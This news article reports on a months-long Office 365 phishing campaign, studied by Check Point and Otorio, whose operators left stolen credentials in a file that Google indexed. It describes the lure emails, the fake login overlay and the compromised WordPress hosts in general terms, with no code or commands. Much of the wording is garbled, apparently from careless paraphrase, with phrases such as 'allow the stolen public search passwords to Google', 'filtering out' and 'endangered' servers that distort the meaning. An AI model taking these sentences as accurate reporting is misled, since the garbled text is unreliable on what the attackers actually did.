Hackers who hit thousands of organizations worldwide in a massive phishing campaign forgot to protect their loot and allow the stolen public search passwords to Google.
The phishing campaign has been going on for over half a year and uses dozens of domains that host the phishing sites. It has been constantly updated to make the fraudulent Microsoft Office 365 login requests look more realistic.
Creds in clear view
Despite relying on simple techniques, the campaign manages to bypass email protection filters and has garnered at least 1,000 credentials for corporate Office 365 accounts.
Researchers at cyber security companies Check Point and Otorio analyzing this campaign have discovered that the hackers exposed the stolen evidence to the public internet.
In a report published today, they explain that the attackers are filtering out the information to the domains they have registered specifically for the task. Their mistake was to put the data in a publicly visible file that Google had indexed.
As a result, Google may show results for queries about a stolen email address or password, as seen in the screenshot below:
Investigators from the two cyber-security companies say the attackers also endangered legitimate WordPress servers to host the malicious PHP page delivered to victims.
“Attackers usually prefer to compromise servers instead of their own infrastructure because of the well-known reputation of existing sites,” the researchers explain.
By processing information from about 500 entries, the researchers were able to determine that businesses in the construction, energy and IT sectors were the most common targets of these phishing attacks.
Simple, effective fishing
The attackers used several phishing email themes to lure potential victims to load the landing page that collected their Microsoft Office 365 username and password.
The malicious emails had the target’s first name or the title of the business in the subject line and were a Xerox scan notification in HTML format.
To open the attachment loaded in the default browser, a blurry image is overlaid by a fake Microsoft Office 365 login. The username field is already filled in with the victim’s email address, which usually removes the suspicion of login theft.
A JavaScript code running in the background checks the validity of the credentials, sends it to the attacker’s drop zone server, and redirects the victim to the legitimate Office 365 login page.
To keep the campaign unnoticed, the actor used compromised email accounts to spread the fraudulent messages. For one attack, they mimicked the German host provider IONOS by 1 & 1.
Although this campaign started in August, the researchers found phishing emails from the same threat actor dated May 2020.
Although Google’s pages where hackers store stolen data is not the first time, it shows that not all malicious actors are skilled enough to protect their operations. Even if they are not identified, at least their actions can be thwarted.